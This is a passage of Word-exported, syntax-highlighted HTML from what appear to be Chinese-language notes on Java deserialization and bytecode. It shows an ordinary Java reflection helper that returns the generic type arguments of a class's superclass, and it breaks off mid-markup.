style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> value</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">catch</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">IllegalAccessException</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> e</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">//log.error("setFieldValue:", e);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              

              

              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/**</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Cambria;">通过反射,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Cambria;">获得定义</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> Class </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Cambria;">时声明的父类的泛型参数的类型</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Cambria;">如:</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> public EmployeeDao extends BaseDao</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">       <Employee< span>
       </Employee<></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ErrorTok';color: #FF0000;font-weight: bold;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ErrorTok';color: #FF0000;font-weight: bold;font-family: Consolas;">String</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;"><span style="mso-spacerun:yes;">     </span>* @</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">param clazz</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">@</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">param index</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">@</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">return</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*/</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'AttributeTok';color: #7D9029;font-family: Consolas;">@SuppressWarnings</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"unchecked"</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">public</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">static</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Class</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getSuperClassGenricType</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Class</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> clazz</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">int</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> index</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Type</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> genType </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> clazz</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getGenericSuperclass</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">();</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                

                </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">if</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(!(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">genType </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">instanceof</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">ParameterizedType</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">))</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">return</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">class</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                

                </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Type</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">[]</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> params </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">((</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">ParameterizedType</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> genType</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">).</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getActualTypeArguments</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">();</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                

                </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">if</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">index </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">>=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> params</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">length</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">||</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> index </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span 